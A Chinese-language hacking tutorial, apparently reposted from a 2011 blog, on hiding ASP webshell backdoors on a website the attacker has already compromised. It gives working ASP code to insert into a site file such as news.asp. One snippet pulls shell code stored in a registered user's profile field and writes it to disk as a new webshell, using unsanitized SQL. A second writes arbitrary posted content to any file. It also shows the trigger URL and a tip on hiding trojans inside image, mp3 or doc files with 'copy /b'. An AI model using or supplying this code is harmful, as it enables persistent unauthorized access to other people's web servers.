巧用.mdb后缀数据库做后门
我不否認n早前的那個把asp木馬寫到圖片文件中不失為一種好的方法,其實不僅可以寫到圖片啦 寫到mp3文件里寫到doc文件里都是可以的啦
? ? copy 文件名/參數 + 文件名/參數 生成文件名
? ? 這樣的方法可以很靈活的運用來達到隱藏文件的目的,具體的參數就是/a以acsic碼方式,/b二進制方式,就不羅嗦這些了,至于如何上傳 webshell,什么是webshell也不屬于本文的討論范圍。今天要講的是如何把后門放到后綴。mdb的數據庫中,前提是在我們拿到
? ? 一個webshell之后…
? ? 我們所知道的,很多站點在用戶注冊的時候要讓填好多東西例如:
? ? 用戶名、密碼、qq、郵箱、個人簡介、電話、聯系方式、住址一類的
? ? 而對應到數據庫中也都會有相應的表 字段 值
? ? 我今天要做的就是 我注冊一個用戶在 我的個人簡介的地方上寫入shell代碼,然后修改他站點上的一個文件,使用的時候觸發這個文件,就把我個人簡歷中的shell代碼,備份到當前目錄下
? ? 廢話少說了 大家看代碼
? ? <%
? ? if request(“action”)=“firefox” then
? ? fname=request.querystring(“fn”)
? ? tname=request.querystring(“tn”)
? ? bname=request.querystring(“bn”)
? ? id=request.querystring(“id”)
? ? idvalue=request.querystring(“idv”)
? ? set rs=server.createobject(“ADODB.recordset”)
? ? sql=“select ”& bname & “ from ”&tname& “ where ”&id&“=”&idvalue&“”“”
? ? rs.open sql,conn,1,3
? ? if not rs.eof then
? ? content=rs(bname)
? ? else
? ? response.write “Nothing”
? ? end if
? ? set fso=Server.CreateObject(“Scripting.FileSystemObject”)
? ? set txtfile=fso.createtextfile(server.mappath(fname))
? ? txtfile.writeline(content)
? ? txtfile.close
? ? end if
? ? %>
? ? 將上邊的代碼加到站點的一個文件中 如news.asp
? ? 根據我們了解的信息 在其站點注冊后 下載數據庫看結構
? ? 我注冊的firefox名字是在 user表 其id值為119 用于存放我注冊簡歷的表字段為jl
? ? 那么在使用的時候我們
? ? news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119
? ? 就可以在news.asp相同目錄下寫入一個名為 firefox.asp的webshell
? ? 以上可以說是萬千隱藏方法中的一種 下邊再說另外一種更方便的隱藏方法
? ? 這個方法就和mdb后綴無關系了
? ? 同樣我們還是修改news.asp 將以下代碼插入到對方news.asp中
? ? <%
? ? if request(“action”)=“firefox” then
? ? n=request.form(“n”)
? ? c=request.form(“c”)
? ? set fso=Server.CreateObject(“Scripting.FileSystemObject”)
? ? set txtfile=fso.createtextfile(server.mappath(n))
? ? txtfile.writeline(c)
? ? txtfile.close
? ? end if
? ? %>
? ? 這段代碼相對簡單些 算是一個木馬的服務端吧。引言:好長時間了,從剛開始的站點管理器到現在流行的幾款asp后門,相信大多網管都能說出這些經典webshell的名字,如 海洋、老兵、藍屏等,也相信大多數的網管學會了關鍵字的搜索方法來搜索這些木馬,當然現在的時間如果再象隱藏后門就要講些技巧啦,俗話說的好“佛高一尺, 我高一丈”。
轉載于:https://www.cnblogs.com/amwld/archive/2011/08/31/2161273.html
創作挑戰賽新人創作獎勵來咯,堅持創作打卡瓜分現金大獎總結
以上是生活随笔為你收集整理的巧用.mdb后缀数据库做后门的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 堆栈的理解
- 下一篇: wincc连接mysql数据库说明_wi